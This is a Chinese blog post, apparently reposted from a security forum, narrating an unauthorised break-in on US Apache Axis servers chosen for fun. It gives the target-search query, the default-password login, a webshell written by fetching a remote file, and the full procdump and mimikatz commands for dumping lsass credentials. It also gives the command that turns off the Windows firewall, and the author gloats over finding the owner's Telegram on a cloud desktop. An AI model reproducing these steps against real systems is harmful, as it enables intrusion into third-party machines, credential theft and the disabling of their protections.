摸鱼
日常摸鱼,无聊,想搞几台机器玩一玩,在网上找目标,找老外的机器下手
目标
country="US" && app="APACHE-Axis"
从老洞捡些漏网之鱼,没准还会有意外收获
目标出现
还是熟悉的页面,熟悉的端口
然后尝试默认口令登录,ok, 这下稳了
先搜集一下信息
不要上来就部署包,先看一下现有的服务,像这种弱口令的基本上99.9999%都已经被人搞过了
再上传包就多此一举了,可以直接利用
找了一圈没发现遗留的马儿
找绝对路径自己上传
C:/elocker/webapps/admin/WEB-INF/classes
顺手一测,竟然可以出网,也不需要传shell了,直接掏出cs
执行命令
看结果失败了
反弹shell
难道是因为在url里执行,导致powershell命令没有执行成功吗?
带着这个疑问 反弹shell尝试一下
结果还是失败,可以确定,应该是有waf
写入shell
x.x.x.x:8080/services/config/download?url=http://x.x.x.x/dama.txt&path=C:\elocker\webapps\admin\axis2-web\shell.jsp
查看一下进程
通过对比发现某安全卫士
绕过杀软
通过测试发现,最基本的net user
也执行不了
摆在面前的路只有2条
- 做免杀
- 抓密码
果断选择抓密码,简单有效。
mimikatz不免杀不可直接用
这里我利用procdump把lsass进程的内存文件导出本地,再在本地利用mimikatz读取密码
上传 procdump64.exe 并下载lsass.dmp
再在本地解析文件
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
# 导出为lsass.dump文件
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
# 把lsass.dmp放在mimikatz目录利用
得到hash,破解密码
登录服务器
查看防火墙状态
Netsh Advfirewall show allprofiles
关闭防火墙
NetSh Advfirewall set allprofiles state off
内网IP,需搭建代理
登录云桌面,发现意外惊喜
发现机主运行了 telegram,嘿嘿
BY:先知论坛
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论